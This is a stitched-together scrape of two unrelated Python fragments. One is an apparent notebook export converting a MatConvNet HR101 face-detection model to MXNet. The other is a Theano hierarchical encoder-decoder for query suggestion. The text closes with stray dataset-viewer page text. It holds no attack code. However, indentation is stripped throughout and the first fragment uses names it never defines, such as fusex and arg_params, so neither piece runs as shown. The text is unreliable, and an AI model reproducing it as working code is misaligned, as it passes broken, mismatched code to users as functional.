layers = net['layers'][0][0][0]
mat_params = net['params'][0][0][0]
mat_params_dict = {}
for p in mat_params:
mat_params_dict[p[0][0]] = p[1]
# In[124]:
for k, layer in enumerate(layers):
type_string = ''
param_string = ''
layer_name = layer[0][0]
layer_type = layer[1][0]
layer_inputs = []
layer_outputs = []
layer_params = []
layer_inputs_count=layer[2][0].shape[0]
for i in range(layer_inputs_count):
layer_inputs.append(layer[2][0][i][0])
layer_outputs_count=layer[3][0].shape[0]
for i in range(layer_outputs_count):
layer_outputs.append(layer[3][0][i][0])
if layer[4].shape[0] > 0:
layer_params_count = layer[4][0].shape[0]
for i in range(layer_params_count):
layer_params.append(layer[4][0][i][0])
if layer_type == u'dagnn.Conv':
nchw = layer[5][0][0][0][0]
hasBias = layer[5][0][0][1][0][0]
pad = layer[5][0][0][3][0]
stride = layer[5][0][0][4][0]
dilate = layer[5][0][0][5][0]
type_string = 'mx.symbol.Convolution'
wmat = mat_params_dict[layer_name+'_filter']
wmat = np.transpose(wmat, [3,2,0,1]) # matlab array is (h w c n) so need to swap axes
arg_params[layer_name+'_weight'] = mx.nd.array(wmat)
if hasBias:
bias = mat_params_dict[layer_name+'_bias'][0]
arg_params[layer_name+'_bias'] = mx.nd.array(bias)
elif layer_type == u'dagnn.BatchNorm':
epslion = layer[5][0][0][1][0][0]
type_string = 'mx.symbol.BatchNorm'
gamma = mat_params_dict[layer_name+'_mult'][:,0]
beta = mat_params_dict[layer_name+'_bias'][:,0]
moments = mat_params_dict[layer_name+'_moments']
moving_mean = moments[:,0]
moving_var = moments[:,1] * moments[:,1] - epslion
arg_params[layer_name+'_gamma'] = mx.nd.array(gamma)
arg_params[layer_name+'_beta'] = mx.nd.array(beta)
aux_params[layer_name+'_moving_mean'] = mx.nd.array(moving_mean)
aux_params[layer_name+'_moving_var'] = mx.nd.array(moving_var)
elif layer_type == u'dagnn.ConvTranspose':
nchw = layer[5][0][0][0][0]
hasBias = layer[5][0][0][1][0][0]
upsample = layer[5][0][0][2][0]
crop = layer[5][0][0][3][0]
type_string = 'mx.symbol.Deconvolution'
wmat = mat_params_dict[layer_name+'f']
wmat = np.transpose(wmat, [3,2,0,1]) # matlab array is (h w c n) so need to swap axes
arg_params[layer_name+'_weight']=mx.nd.array(wmat)
elif layer_type == u'dagnn.Pooling':
mathod = layer[5][0][0][0][0]
poolSize = layer[5][0][0][1][0]
pad = layer[5][0][0][3][0]
stride = layer[5][0][0][4][0]
type_string = 'mx.symbol.Pooling'
param_string = "pooling_convention='full', "
param_string += "pad=(%d,%d), kernel=(%d,%d), stride=(%d,%d)" % (
pad[0], pad[2], poolSize[0], poolSize[1],
stride[0], stride[1])
elif layer_type == u'dagnn.ReLU':
type_string = 'mx.symbol.Activation'
param_string = "act_type='relu'"
elif layer_type == u'dagnn.Sum':
type_string = 'mx.symbol.broadcast_add'
param_string = ""
pass
else:
pass
# In[126]:
fusex.save('hr101-symbol.json')
# In[127]:
model = mx.mod.Module(symbol=fusex, data_names=['data'], label_names=None)
model.bind(data_shapes=[('data', (1, 3, 224, 224))])
model.init_params(arg_params=arg_params, aux_params=aux_params)
model.save_checkpoint('hr101', 0)
|
|
"""
Query suggestion hierarchical encoder-decoder code.
The code is inspired from nmt encdec code in groundhog
but we do not rely on groundhog infrastructure.
"""
__docformat__ = 'restructedtext en'
__authors__ = ("Alessandro Sordoni")
__contact__ = "Alessandro Sordoni <sordonia@iro.umontreal>"
import theano
import theano.tensor as T
import numpy as np
import cPickle
import logging
logger = logging.getLogger(__name__)
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.tensor.nnet.conv3d2d import *
from collections import OrderedDict
from model import *
from utils import *
import operator
# Theano speed-up
theano.config.scan.allow_gc = False
def add_to_params(params, new_param):
params.append(new_param)
return new_param
class EncoderDecoderBase():
def __init__(self, state, rng, parent):
self.rng = rng
self.parent = parent
self.state = state
self.__dict__.update(state)
self.session_rec_activation = eval(self.session_rec_activation)
self.query_rec_activation = eval(self.query_rec_activation)
self.params = []
class Encoder(EncoderDecoderBase):
def init_params(self):
""" sent weights """
# embedding
self.W_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.idim, self.rankdim), name='W_emb'))
self.W_in = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in'))
self.W_hh = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='W_hh'))
self.b_hh = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_hh'))
if self.query_step_type == "gated":
self.W_in_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in_r'))
self.W_in_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in_z'))
self.W_hh_r = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='W_hh_r'))
self.W_hh_z = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='W_hh_z'))
self.b_z = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_z'))
self.b_r = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_r'))
""" Context weights """
self.Ws_in = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, self.sdim), name='Ws_in'))
self.Ws_hh = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.sdim, self.sdim)), name='Ws_hh'))
self.bs_hh = add_to_params(self.params, theano.shared(value=np.zeros((self.sdim,), dtype='float32'), name='bs_hh'))
if self.session_step_type == "gated":
self.Ws_in_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, self.sdim), name='Ws_in_r'))
self.Ws_in_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, self.sdim), name='Ws_in_z'))
self.Ws_hh_r = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.sdim, self.sdim)), name='Ws_hh_r'))
self.Ws_hh_z = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.sdim, self.sdim)), name='Ws_hh_z'))
self.bs_z = add_to_params(self.params, theano.shared(value=np.zeros((self.sdim,), dtype='float32'), name='bs_z'))
self.bs_r = add_to_params(self.params, theano.shared(value=np.zeros((self.sdim,), dtype='float32'), name='bs_r'))
def plain_query_step(self, x_t, m_t, h_tm1, hr_tm1):
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
h_t = self.query_rec_activation(T.dot(x_t, self.W_in) + T.dot(hr_tm1, self.W_hh) + self.b_hh)
hr_t = m_t * h_t
return h_t, hr_t,
def gated_query_step(self, x_t, m_t, h_tm1, hr_tm1):
theano.printing.debugprint(x_t)
theano.printing.debugprint(m_t)
theano.printing.debugprint(h_tm1)
theano.printing.debugprint(hr_tm1)
# print x_t.get_value().shape
# print m_t.get_value().shape
# print h_tm1.get_value().shape
# print hr_tm1.get_value().shape
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
r_t = T.nnet.sigmoid(T.dot(x_t, self.W_in_r) + T.dot(hr_tm1, self.W_hh_r) + self.b_r)
z_t = T.nnet.sigmoid(T.dot(x_t, self.W_in_z) + T.dot(hr_tm1, self.W_hh_z) + self.b_z)
h_tilde = self.query_rec_activation(T.dot(x_t, self.W_in) + T.dot(r_t * hr_tm1, self.W_hh) + self.b_hh)
h_t = (np.float32(1.0) - z_t) * hr_tm1 + z_t * h_tilde
hr_t = m_t * h_t
# return both reset state and non-reset state
return h_t, hr_t, r_t, z_t, h_tilde
def plain_session_step(self, h_t, m_t, hs_tm1):
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
hs_update = self.session_rec_activation(T.dot(h_t, self.Ws_in) + T.dot(hs_tm1, self.Ws_hh) + self.bs_hh)
hs_t = (m_t) * hs_tm1 + (1 - m_t) * hs_update
return hs_t,
def gated_session_step(self, h_t, m_t, hs_tm1):
rs_t = T.nnet.sigmoid(T.dot(h_t, self.Ws_in_r) + T.dot(hs_tm1, self.Ws_hh_r) + self.bs_r)
zs_t = T.nnet.sigmoid(T.dot(h_t, self.Ws_in_z) + T.dot(hs_tm1, self.Ws_hh_z) + self.bs_z)
hs_tilde = self.session_rec_activation(T.dot(h_t, self.Ws_in) + T.dot(rs_t * hs_tm1, self.Ws_hh) + self.bs_hh)
hs_update = (np.float32(1.) - zs_t) * hs_tm1 + zs_t * hs_tilde
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
hs_t = (m_t) * hs_tm1 + (1 - m_t) * hs_update
return hs_t, hs_tilde, rs_t, zs_t
def approx_embedder(self, x):
return self.W_emb[x]
def build_encoder(self, x, xmask=None, **kwargs):
one_step = False
if len(kwargs):
one_step = True
# if x.ndim == 2 then
# x = (n_steps, batch_size)
if x.ndim == 2:
batch_size = x.shape[1]
# else x = (word_1, word_2, word_3, ...)
# or x = (last_word_1, last_word_2, last_word_3, ..)
# in this case batch_size is
else:
batch_size = 1
# if it is not one_step then we initialize everything to 0
if not one_step:
h_0 = T.alloc(np.float32(0), batch_size, self.qdim)
hr_0 = T.alloc(np.float32(0), batch_size, self.qdim)
hs_0 = T.alloc(np.float32(0), batch_size, self.sdim)
# in sampling mode (i.e. one step) we require
else:
# in this case x.ndim != 2
assert x.ndim != 2
assert 'prev_h' in kwargs
assert 'prev_hr' in kwargs
assert 'prev_hs' in kwargs
h_0 = kwargs['prev_h']
hr_0 = kwargs['prev_hr']
hs_0 = kwargs['prev_hs']
xe = self.approx_embedder(x)
if xmask == None:
xmask = T.neq(x, self.eoq_sym)
# Gated Encoder
if self.query_step_type == "gated":
f_enc = self.gated_query_step
o_enc_info = [h_0, hr_0, None, None, None]
else:
f_enc = self.plain_query_step
o_enc_info = [h_0, hr_0]
if self.session_step_type == "gated":
f_hier = self.gated_session_step
o_hier_info = [hs_0, None, None, None]
else:
f_hier = self.plain_session_step
o_hier_info = [hs_0]
# Run through all the sentence (encode everything)
if not one_step:
_res, _ = theano.scan(
f_enc, sequences=[xe, xmask], outputs_info=o_enc_info)
# Make just one step further
else:
_res = f_enc(xe, xmask, h_0, hr_0)
# Get the hidden state sequence
h = _res[0]
hr = _res[1]
# All hierarchical sentence
# The hs sequence is based on the original mask
if not one_step:
_res, _ = theano.scan(
f_hier, sequences=[h, xmask], outputs_info=o_hier_info)
# Just one step further
else:
_res = f_hier(h, xmask, hs_0)
if isinstance(_res, list) or isinstance(_res, tuple):
hs = _res[0]
else:
hs = _res
return (h, hr), hs, (_res[2], _res[3])
def __init__(self, state, rng, parent):
EncoderDecoderBase.__init__(self, state, rng, parent)
self.init_params()
class Decoder(EncoderDecoderBase):
EVALUATION = 0
BEAM_SEARCH = 1
def __init__(self, state, rng, parent, encoder):
EncoderDecoderBase.__init__(self, state, rng, parent)
# Take as input the encoder instance for the embeddings..
# To modify in the future
self.encoder = encoder
self.trng = MRG_RandomStreams(self.seed)
self.init_params()
def init_params(self):
""" Decoder weights """
self.Wd_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.idim, self.rankdim), name='Wd_emb'))
self.Wd_hh = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='Wd_hh'))
self.Wd_in = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='Wd_in'))
self.bd_hh = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='bd_hh'))
self.Wd_s_0 = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, self.qdim), name='Wd_s_0'))
self.bd_s_0 = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='bd_s_0'))
if self.decoder_bias_type == 'all':
self.Wd_s_q = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, self.qdim), name='Wd_s_q'))
if self.query_step_type == "gated":
self.Wd_in_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='Wd_in_r'))
self.Wd_in_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='Wd_in_z'))
self.Wd_hh_r = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='Wd_hh_r'))
self.Wd_hh_z = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='Wd_hh_z'))
self.bd_r = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='bd_r'))
self.bd_z = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='bd_z'))
if self.decoder_bias_type == 'all':
self.Wd_s_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, self.qdim), name='Wd_s_z'))
self.Wd_s_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, self.qdim), name='Wd_s_r'))
out_target_dim = self.qdim
if not self.maxout_out:
out_target_dim = self.rankdim
self.Wd_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, out_target_dim), name='Wd_out'))
self.bd_out = add_to_params(self.params, theano.shared(value=np.zeros((self.idim,), dtype='float32'), name='bd_out'))
# Set up deep output
if self.deep_out:
self.Wd_e_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, out_target_dim), name='Wd_e_out'))
self.bd_e_out = add_to_params(self.params, theano.shared(value=np.zeros((out_target_dim,), dtype='float32'), name='bd_e_out'))
if self.decoder_bias_type != 'first':
self.Wd_s_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, out_target_dim), name='Wd_s_out'))
""" Rank """
if hasattr(self, 'train_rank'):
self.Wr_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, 1), name='Wr_out'))
self.br_out = add_to_params(self.params, theano.shared(value=np.zeros((1,), dtype='float32'), name='br_out'))
def build_rank_layer(self, hs):
return T.dot(hs, self.Wr_out) + self.br_out
def build_output_layer(self, hs, xd, hd):
pre_activ = T.dot(hd, self.Wd_out)
if self.deep_out:
pre_activ += T.dot(xd, self.Wd_e_out) + self.bd_e_out
if self.decoder_bias_type != 'first':
pre_activ += T.dot(hs, self.Wd_s_out)
# ^ if bias all, bias the deep output
if self.maxout_out:
pre_activ = Maxout(2)(pre_activ)
return pre_activ
def build_next_probs_predictor(self, hs, x, prev_hd):
"""
Return output probabilities given prev_words x, hierarchical pass hs, and previous hd
hs should always be the same (and should not be updated).
"""
return self.build_decoder(hs, x, mode=Decoder.BEAM_SEARCH, prev_hd=prev_hd)
def approx_embedder(self, x):
# Here we use the same embeddings learnt in the encoder !!!
return self.encoder.approx_embedder(x)
def output_softmax(self, pre_activ):
# returns a (timestep, bs, idim) matrix (huge)
return SoftMax(T.dot(pre_activ, self.Wd_emb.T) + self.bd_out)
def build_decoder(self, hs, x, xmask=None, y=None, y_neg=None, mode=EVALUATION, prev_hd=None, step_num=None):
# Check parameter consistency
if mode == Decoder.EVALUATION:
assert not prev_hd
assert y
else:
assert not y
assert prev_hd
# if mode == EVALUATION
# xd = (timesteps, batch_size, qdim)
#
# if mode != EVALUATION
# xd = (n_samples, dim)
xd = self.approx_embedder(x)
if not xmask:
xmask = T.neq(x, self.eoq_sym)
# we must zero out the </s> embedding
# i.e. the embedding x_{-1} is the 0 vector
# as well as hd_{-1} which will be reseted in the scan functions
if xd.ndim != 3:
assert mode != Decoder.EVALUATION # So only in beam search
xd = (xd.dimshuffle((1, 0)) * xmask).dimshuffle((1, 0))
else:
assert mode == Decoder.EVALUATION
xd = (xd.dimshuffle((2,0,1)) * xmask).dimshuffle((1,2,0))
# Run the decoder
if mode == Decoder.EVALUATION:
hd_init = T.alloc(np.float32(0), x.shape[1], self.qdim)
else:
hd_init = prev_hd
if self.query_step_type == "gated":
f_dec = self.gated_step
o_dec_info = [hd_init, None, None, None]
else:
f_dec = self.plain_step
o_dec_info = [hd_init]
# If the mode of the decoder is EVALUATION
# then we evaluate by default all the sentence
# xd - i.e. xd.ndim == 3, xd = (timesteps, batch_size, qdim)
if mode == Decoder.EVALUATION:
_res, _ = theano.scan(f_dec,
sequences=[xd, xmask, hs], \
outputs_info=o_dec_info)
# else we evaluate only one step of the recurrence using the
# previous hidden states and the previous computed hierarchical
# states.
else:
_res = f_dec(xd, xmask, hs, prev_hd)
if isinstance(_res, list) or isinstance(_res, tuple):
hd = _res[0]
else:
hd = _res
pre_activ = self.build_output_layer(hs, xd, hd)
# EVALUATION : Return target_probs + all the predicted ranks
# target_probs.ndim == 3
if mode == Decoder.EVALUATION:
target_probs = GrabProbs(self.output_softmax(pre_activ), y)
return target_probs, hd, _res
# BEAM_SEARCH : Return output (the softmax layer) + the new hidden states
elif mode == Decoder.BEAM_SEARCH:
return self.output_softmax(pre_activ), hd
def gated_step(self, xd_t, m_t, hs_t, hd_tm1):
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
hd_tm1 = (m_t) * hd_tm1 + (1 - m_t) * self.query_rec_activation(T.dot(hs_t, self.Wd_s_0) + self.bd_s_0)
# hd_{t - 1} = tanh(W_s_0 hs_t + bd_s_0) else hd_{t - 1} is left unchanged (m_t = 1)
# In the 'all' decoder bias type each hidden state of the decoder
# RNN receives the hs_t vector as bias without modification
if self.decoder_bias_type == 'all':
rd_t = T.nnet.sigmoid(T.dot(xd_t, self.Wd_in_r) + T.dot(hd_tm1, self.Wd_hh_r) + T.dot(hs_t, self.Wd_s_r) + self.bd_r)
zd_t = T.nnet.sigmoid(T.dot(xd_t, self.Wd_in_z) + T.dot(hd_tm1, self.Wd_hh_z) + T.dot(hs_t, self.Wd_s_z) + self.bd_z)
hd_tilde = self.query_rec_activation(T.dot(xd_t, self.Wd_in)
+ T.dot(rd_t * hd_tm1, self.Wd_hh)
+ T.dot(hs_t, self.Wd_s_q)
+ self.bd_hh)
hd_t = (np.float32(1.) - zd_t) * hd_tm1 + zd_t * hd_tilde
output = (hd_t, rd_t, zd_t, hd_tilde)
else:
# Do not bias all the decoder (force to store very useful information in the first state)
rd_t = T.nnet.sigmoid(T.dot(xd_t, self.Wd_in_r) + T.dot(hd_tm1, self.Wd_hh_r) + self.bd_r)
zd_t = T.nnet.sigmoid(T.dot(xd_t, self.Wd_in_z) + T.dot(hd_tm1, self.Wd_hh_z) + self.bd_z)
hd_tilde = self.query_rec_activation(T.dot(xd_t, self.Wd_in)
+ T.dot(rd_t * hd_tm1, self.Wd_hh)
+ self.bd_hh)
hd_t = (np.float32(1.) - zd_t) * hd_tm1 + zd_t * hd_tilde
output = (hd_t, rd_t, zd_t, hd_tilde)
return output
def plain_step(self, xd_t, m_t, hs_t, hd_tm1):
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
# We already assume that xd are zeroed out
hd_tm1 = (m_t) * hd_tm1 + (1 - m_t) * self.query_rec_activation(T.dot(hs_t, self.Wd_s_0) + self.bd_s_0)
# ^ iff x_{t - 1} = </s> (m_t = 0) then x_{t-1} = 0
# and hd_{t - 1} = 0 else hd_{t - 1} is left unchanged (m_t = 1)
if self.decoder_bias_type == 'first':
# Do not bias all the decoder (force to store very useful information in the first state)
hd_t = self.query_rec_activation( T.dot(xd_t, self.Wd_in)
+ T.dot(hd_tm1, self.Wd_hh)
+ self.bd_hh )
output = (hd_t,)
elif self.decoder_bias_type == 'all':
hd_t = self.query_rec_activation( T.dot(xd_t, self.Wd_in)
+ T.dot(hd_tm1, self.Wd_hh)
+ T.dot(hs_t, self.Wd_s_q)
+ self.bd_hh )
output = (hd_t,)
return output
####
class SessionEncoderDecoder(Model):
def indices_to_words(self, seq, exclude_start_end=False):
"""
Converts a list of words to a list
of word ids. Use unk_sym if a word is not
known.
"""
def convert():
for word_index in seq:
if word_index > len(self.idx_to_str):
raise ValueError('Word index is too large for the model vocabulary!')
if word_index == self.eos_sym:
break
if not exclude_start_end or (word_index != self.eoq_sym and word_index != self.soq_sym):
yield self.idx_to_str[word_index]
return list(convert())
def words_to_indices(self, seq):
"""
Converts a list of words to a list
of word ids. Use unk_sym if a word is not
known.
"""
return [self.str_to_idx.get(word, self.unk_sym) for word in seq]
def compute_updates(self, training_cost, params):
updates = []
grads = T.grad(training_cost, params)
grads = OrderedDict(zip(params, grads))
# Clip stuff
c = numpy.float32(self.cutoff)
clip_grads = []
norm_gs = T.sqrt(sum(T.sum(g ** 2) for p, g in grads.items()))
normalization = T.switch(T.ge(norm_gs, c), c / norm_gs, np.float32(1.))
notfinite = T.or_(T.isnan(norm_gs), T.isinf(norm_gs))
for p, g in grads.items():
clip_grads.append((p, T.switch(notfinite, numpy.float32(.1) * p, g * normalization)))
grads = OrderedDict(clip_grads)
if self.updater == 'adagrad':
updates = Adagrad(grads, self.lr)
elif self.updater == 'sgd':
raise Exception("Sgd not implemented!")
elif self.updater == 'adadelta':
updates = Adadelta(grads)
elif self.updater == 'rmsprop':
updates = RMSProp(grads, self.lr)
elif self.updater == 'adam':
updates = Adam(grads)
else:
raise Exception("Updater not understood!")
return updates
def build_train_function(self):
if not hasattr(self, 'train_fn'):
# Compile functions
logger.debug("Building train function")
self.train_fn = theano.function(
inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
outputs=self.training_cost, updates=self.updates, name="train_fn")
return self.train_fn
def build_eval_function(self):
if not hasattr(self, 'eval_fn'):
# Compile functions
logger.debug("Building evaluation function")
self.eval_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
outputs=self.training_cost, name="eval_fn")
return self.eval_fn
def build_score_function(self):
if not hasattr(self, 'score_fn'):
self.score_fn = theano.function(
inputs=[self.x_data, self.x_max_length],
outputs=[self.per_example_cost],
name="score_fn")
return self.score_fn
def build_rank_prediction_function(self):
if not hasattr(self, 'rank_fn'):
(h, hr), hs, _ = self.encoder.build_encoder(self.aug_x_data)
ranks = self.decoder.build_rank_layer(hs)
self.rank_fn = theano.function(
inputs=[self.x_data],
outputs=[ranks],
name="rank_fn")
return self.rank_fn
def build_get_states_function(self):
if not hasattr(self, 'get_states_fn'):
# Compile functions
logger.debug("Get states of the network")
outputs = [self.h, self.hs, self.hd, self.rs, self.us] + [x for x in self.decoder_states]
self.get_states_fn = theano.function(inputs=[self.x_data, self.x_max_length],
outputs=outputs, name="get_states_fn")
return self.get_states_fn
def build_next_probs_function(self):
if not hasattr(self, 'next_probs_fn'):
outputs, hd = self.decoder.build_next_probs_predictor(
self.beam_hs, self.beam_source, prev_hd=self.beam_hd)
self.next_probs_fn = theano.function(
inputs=[self.beam_hs, self.beam_source, self.beam_hd],
outputs=[outputs, hd],
name="next_probs_fn")
return self.next_probs_fn
def build_first_vector(self):
if not hasattr(self, 'first_vec_fn'):
(h, hr), hs, _ = self.encoder.build_encoder(self.aug_x_data)
hd0 = self.decoder.query_rec_activation(T.dot(hs, self.decoder.Wd_s_0) + self.decoder.bd_s_0)
self.first_vec_fn = theano.function(inputs=[self.x_data],
outputs=[h, hs, hd0], name="first_vec_fn")
return self.first_vec_fn
def build_encoder_function(self):
if not hasattr(self, 'encoder_fn'):
(h, hr), hs, _ = self.encoder.build_encoder(self.aug_x_data)
self.encoder_fn = theano.function(inputs=[self.x_data],
outputs=[h, hr, hs], name="encoder_fn")
return self.encoder_fn
def __init__(self, state):
Model.__init__(self)
self.state = state
# Compatibility towards older models
self.__dict__.update(state)
self.rng = numpy.random.RandomState(state['seed'])
# Load dictionary
raw_dict = cPickle.load(open(self.dictionary, 'r'))
# Probabilities for each term in the corpus
self.noise_probs = [x[2] for x in sorted(raw_dict, key=operator.itemgetter(1))]
self.noise_probs = numpy.array(self.noise_probs, dtype='float64')
self.noise_probs /= numpy.sum(self.noise_probs)
self.noise_probs = self.noise_probs ** 0.75
self.noise_probs /= numpy.sum(self.noise_probs)
self.t_noise_probs = theano.shared(self.noise_probs.astype('float32'), 't_noise_probs')
# Dictionaries to convert str to idx and vice-versa
self.str_to_idx = dict([(tok, tok_id) for tok, tok_id, _ in raw_dict])
self.idx_to_str = dict([(tok_id, tok) for tok, tok_id, freq in raw_dict])
if '</q>' not in self.str_to_idx \
or '</s>' not in self.str_to_idx:
raise Exception("Error, malformed dictionary!")
# Number of words in the dictionary
self.idim = len(self.str_to_idx)
self.state['idim'] = self.idim
logger.debug("Initializing encoder")
self.encoder = Encoder(self.state, self.rng, self)
logger.debug("Initializing decoder")
self.decoder = Decoder(self.state, self.rng, self, self.encoder)
# Init params
self.params = self.encoder.params + self.decoder.params
assert len(set(self.params)) == (len(self.encoder.params) + len(self.decoder.params))
self.y_neg = T.itensor3('y_neg')
self.x_data = T.imatrix('x_data')
self.x_ranks = T.imatrix('x_ranks')
self.x_cost_mask = T.matrix('cost_mask')
self.x_max_length = T.iscalar('x_max_length')
# The training is done with a trick. We append a special </q> at the beginning of the dialog
# so that we can predict also the first sent in the dialog starting from the dialog beginning token (</q>).
self.aug_x_data = T.concatenate([T.alloc(np.int32(self.eoq_sym), 1, self.x_data.shape[1]), self.x_data])
training_x = self.aug_x_data[:self.x_max_length]
training_y = self.aug_x_data[1:self.x_max_length+1]
training_ranks = self.x_ranks[:self.x_max_length-1].flatten()
training_ranks_mask = T.neq(training_ranks, 0).flatten()
# Here we find the end-of-sentence tokens in the minibatch.
training_hs_mask = T.neq(training_x, self.eoq_sym)
training_x_cost_mask = self.x_cost_mask[:self.x_max_length].flatten()
# Backward compatibility
if 'decoder_bias_type' in self.state:
logger.debug("Decoder bias type {}".format(self.decoder_bias_type))
logger.info("Build encoder")
(self.h, _), self.hs, (self.rs, self.us) = \
self.encoder.build_encoder(training_x, xmask=training_hs_mask)
logger.info("Build decoder (EVAL)")
target_probs, self.hd, self.decoder_states = \
self.decoder.build_decoder(self.hs, training_x, xmask=training_hs_mask, \
y=training_y, mode=Decoder.EVALUATION)
logger.info("Build rank predictor")
# self.predicted_ranks = self.decoder.build_rank_layer(self.hs)
# Prediction cost and rank cost
self.per_example_cost = -T.log2(target_probs).reshape((self.x_max_length, self.x_data.shape[1]))
# self.rank_cost = T.sum(((self.predicted_ranks[1:].flatten() - training_ranks) ** 2) * (training_ranks_mask)) / T.sum(training_ranks_mask)
self.training_cost = T.sum(-T.log2(target_probs) * training_x_cost_mask) # + np.float32(self.lambda_rank) * self.rank_cost
self.updates = self.compute_updates(self.training_cost / training_x.shape[1], self.params)
# Beam-search variables
self.beam_source = T.lvector("beam_source")
self.beam_hs = T.matrix("beam_hs")
self.beam_step_num = T.lscalar("beam_step_num")
self.beam_hd = T.matrix("beam_hd")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.